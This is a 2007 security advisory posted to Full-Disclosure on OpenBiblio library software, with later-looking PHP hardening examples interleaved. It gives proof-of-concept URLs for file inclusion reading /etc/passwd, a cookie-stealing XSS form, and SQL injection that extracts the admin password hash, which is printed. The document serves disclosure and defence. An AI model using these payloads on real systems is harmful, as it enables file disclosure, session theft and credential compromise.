Message-ID: <af6679240712271914y42f38d73r5f646a643ce63f0b@mail.gmail.com>
Date: Fri, 28 Dec 2007 04:14:55 +0100
From: "Juan Galiana" <jgaliana@...il.com>
To: bugtraq@...urityfocus.com, bugs@...uritytracker.com, news@...uriteam.com, 
	full-disclosure@...ts.grok.org.uk, vuln@...unia.com, 
	packet@...ketstormsecurity.org
Subject: OpenBiblio 0.5.2-pre4 and prior multiple
	vulnerabilities

 - Security Advisory -



- OpenBiblio 0.5.2-pre4 and prior multiple vulnerabilities -
----------------------------------------------------


Product: OpenBiblio
Version: 0.5.2 Prerelease 4 and prior are affected
Url: http://obiblio.sourceforge.net/
Affected by: Full path disclosure, local file include, phpinfo disclosure,
multiple Cross Site Scripting, SQL injection




I. Introduction.

OpenBiblio is an easy to use, automated library system written in PHP
containing OPAC, circulation, cataloging, and staff administration
functionality. OpenBiblio library administration offers an intuitive
interface with broad category tabs and a sidebar.



II. Description


OpenBiblio suffers from multiple bugs.




1) Local File Include vulnerability: it is possible to include any arbitrary
local file via the shared/help.php file

- Code -
if (isset($_GET["page"])) {
    $page = $_GET["page"];
} else {
    $page = "contents";
}
include("../locale/".OBIB_LOCALE."/help/".$page.".php");

- PoC -
http://site/openbiblio/shared/help.php?page=../../../../../../etc/passwd%00





2) Local File Include (2) (only works with register_globals On, and for
non-PHP files magic_quotes_gpc must be Off)

- Code -
<?php include("../navbars/".$tab.".php");?>

- PoC -
http://site/openbiblio/shared/header.php?tab=../../../etc/passwd%00
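Both include sites above fail for the same reason: a request-controlled string is concatenated into a file path and the only "extension" is a suffix that a null byte or "../" can defeat. The following hardened loader is an added example, not OpenBiblio's own code or the 0.6.0 fix. It assumes the directory layout shown in the two snippets (help pages under ../locale/<OBIB_LOCALE>/help/, navbars under ../navbars/) and that OBIB_LOCALE is already defined by the application's configuration; the function name safeIncludeName is hypothetical.

```php
<?php
// Added hardening example for shared/help.php and shared/header.php.
// Assumes OBIB_LOCALE is defined by OpenBiblio's config (as in the original
// snippet); safeIncludeName() is a hypothetical helper name.

// Return the resolved path of "$baseDir/$name.php" only if $name is a plain
// file name (letters, digits, underscore, hyphen) AND the file exists inside
// $baseDir. One regex rejects "../", absolute paths and NUL bytes at once.
function safeIncludeName($name, $baseDir) {
    if (!is_string($name) || !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $name)) {
        return false;
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . '/' . $name . '.php');
    // realpath() returns false for missing files; additionally confirm the
    // resolved file still lives below the resolved base directory.
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    return $file;
}

// shared/help.php: read the parameter explicitly (never via register_globals)
// and fall back to the "contents" page on anything unexpected.
$helpDir  = '../locale/' . OBIB_LOCALE . '/help';
$page     = isset($_GET['page']) ? $_GET['page'] : 'contents';
$helpFile = safeIncludeName($page, $helpDir);
if ($helpFile === false) {
    $helpFile = safeIncludeName('contents', $helpDir);
}
if ($helpFile !== false) {
    include($helpFile);
}

// shared/header.php: $tab is meant to be set by the calling script. Validating
// it the same way means the include stays safe even if register_globals is On
// and $tab arrived from the query string.
$navbar = isset($tab) ? safeIncludeName($tab, '../navbars') : false;
if ($navbar !== false) {
    include($navbar);
}
```

The value of the allowlist regex is that it does not depend on PHP settings: with it in place, neither register_globals nor magic_quotes_gpc changes the outcome, which is the property a reviewer should look for when checking an include site.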





3) This link shows the phpinfo() output

http://site/openbiblio/phpinfo.php

Remove it!



4) Path Disclosure

Some samples:

http://site/openbiblio/shared/footer.php
Fatal error: Call to a member function on a non-object in
/httpdocs/openbiblio/shared/footer.php on line 18

http://site/openbiblio/circ/mbr_fields.php
Fatal error: Call to a member function on a non-object in
/httpdocs/openbiblio/circ/mbr_fields.php on line 14


http://site/openbiblio/admin/custom_marc_form_fields.php
Fatal error: Cannot instantiate non-existent class: dmquery in
/httpdocs/openbiblio/admin/custom_marc_form_fields.php on line 14


Please turn display_errors Off in php.ini.



5) Multiple Cross Site Scripting: an attacker can perform an XSS attack that
gives access to the targeted user's cookies


Some samples:

http://site/openbiblio/admin/staff_del_confirm.php?UID=1&LAST=[XSS]&FIRST=[XSS]

http://site/openbiblio/admin/theme_del_confirm.php?themeid=6&name=[XSS]

In /admin/theme_preview.php an attacker can inject an XSS payload through the
themeName variable using the POST method.
Here is a PoC:


<form action="http://site/openbiblio/admin/theme_preview.php" method="post">
<input type="text" name="themeName" size="40" value="<script>alert(
document.cookie);</script>"><br><br>
<input type="submit" value="doit">
</form>




try with: <script>alert(document.cookie);</script>
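The three XSS locations above share one root cause: request parameters (LAST, FIRST, name, themeName) are written back into the page without HTML encoding. The following is an added example of the corresponding fix, not OpenBiblio's own code; the parameter names are the ones from the URLs above, the surrounding markup and the helper name h() are assumptions.

```php
<?php
// Added output-encoding example. Parameter names come from the advisory's
// PoC URLs; the HTML around them and the helper name h() are assumed.

// Encode a value for use in an HTML text node or attribute value.
// ENT_QUOTES encodes both quote characters, so the same helper is safe inside
// single- and double-quoted attributes as well as between tags.
function h($s) {
    return htmlspecialchars((string)$s, ENT_QUOTES, 'UTF-8');
}

// Vulnerable pattern (what the staff_del_confirm.php PoC exploits):
// request data echoed raw into the confirmation text.
//   echo "Delete staff member " . $_GET['FIRST'] . " " . $_GET['LAST'] . "?";

// Hardened: every request-derived value passes through h() at the point of
// output. The payload "<script>alert(document.cookie);</script>" is then
// rendered as literal text instead of being executed.
$first = isset($_GET['FIRST']) ? $_GET['FIRST'] : '';
$last  = isset($_GET['LAST'])  ? $_GET['LAST']  : '';
echo '<p>Delete staff member ' . h($first) . ' ' . h($last) . '?</p>';

// Same rule for theme_del_confirm.php (name) and theme_preview.php
// (themeName, POST), including attribute context:
$name      = isset($_GET['name'])       ? $_GET['name']       : '';
$themeName = isset($_POST['themeName']) ? $_POST['themeName'] : '';
echo '<p>Delete theme ' . h($name) . '?</p>';
echo '<input type="text" name="themeName" value="' . h($themeName) . '">';
```

Encoding at output time, rather than filtering on input, is what makes the fix complete: the same value may legitimately contain "<" when stored, and only the HTML context decides how it must be escaped.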





6) SQL injection (a session with the report role is needed to exploit this bug)


Any user with the report role can access any field of the database, including
the admin MD5 hash.


http://site/openbiblio/reports/report_criteria.php?reset=Y&rptid=balanceDueList&title=Balance+Due+Member+List&sql=%0A++++[SQL]%0A++

With this an attacker can get the admin's MD5 password hash:


http://site/openbiblio/reports/report_criteria.php?reset=Y&rptid=balanceDueList&title=Balance+Due+Member+List&sql=%0A++++select+username,pwd+from+staff%20where+userid=1%0A++

Then click "run report" and view the results; you can also choose
between HTML and CSV format ;)


staff.username  staff.pwd
admin   21232f297a57a5a743894a0e4a801fc3
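The report_criteria.php URL above shows the design flaw: the report's SQL text itself travels in the request (the sql= parameter), so any holder of the report role is effectively a database client. The fix is not to sanitize that parameter but to remove it, keeping report definitions on the server and accepting only a report id and bound criteria values. The following is an added example of that pattern, not OpenBiblio's own code or the 0.6.0 fix; the report id "balanceDueList" and its title come from the advisory, while the member table, its columns, the mysqli connection and the function name runReport are assumptions. It assumes PHP 5.6+ for argument unpacking.

```php
<?php
// Added example: server-side report registry with prepared statements.
// "balanceDueList" and its title are from the advisory; the member table,
// column names, connection details and runReport() are assumed.

// The client may choose a report id and supply criteria VALUES. SQL text is
// never read from the request, so no sql= parameter exists to inject into.
$REPORTS = array(
    'balanceDueList' => array(
        'title' => 'Balance Due Member List',
        'sql'   => 'SELECT mbrid, last_name, first_name, balance '
                 . 'FROM member WHERE balance >= ? ORDER BY balance DESC',
        'types' => 'd',   // one double-typed placeholder
    ),
);

// Look up the report by id, bind the criteria, return rows or false.
function runReport(mysqli $db, array $reports, $rptid, array $criteria) {
    if (!isset($reports[$rptid])) {
        return false;   // unknown id: refuse rather than guess
    }
    $def = $reports[$rptid];
    if (strlen($def['types']) !== count($criteria)) {
        return false;   // wrong number of criteria for this report
    }
    $stmt = $db->prepare($def['sql']);
    if ($stmt === false) {
        return false;
    }
    if ($def['types'] !== '') {
        // Values are bound as parameters, never interpolated into the SQL.
        $stmt->bind_param($def['types'], ...$criteria);
    }
    if (!$stmt->execute()) {
        return false;
    }
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Usage (assumed connection): the id comes from the request, the SQL does not.
// $db   = new mysqli('localhost', 'obiblio', 'secret', 'obiblio');
// $rows = runReport($db, $REPORTS, $_GET['rptid'], array((float)$_GET['minBalance']));
```

With this structure the report role authorizes running a fixed set of queries, which is what the role was meant to grant; the original design granted the role SELECT on every table, which is why the staff.pwd column was reachable.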



III. Timeline

20/08/2006 - Bugs discovered
25/08/2006 - Vendor Contacted
30/08/2006 - Release 0.5.2 (partial patch)
21/02/2007 - Release 0.6.0 (full patch)
28/12/2007 - Advisory Disclosure




IV. Solution

Upgrade to 0.6.0 from http://obiblio.sourceforge.net/
Good work! :)


V. Credits

Juan Galiana <jgaliana gmail com>


Regards


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
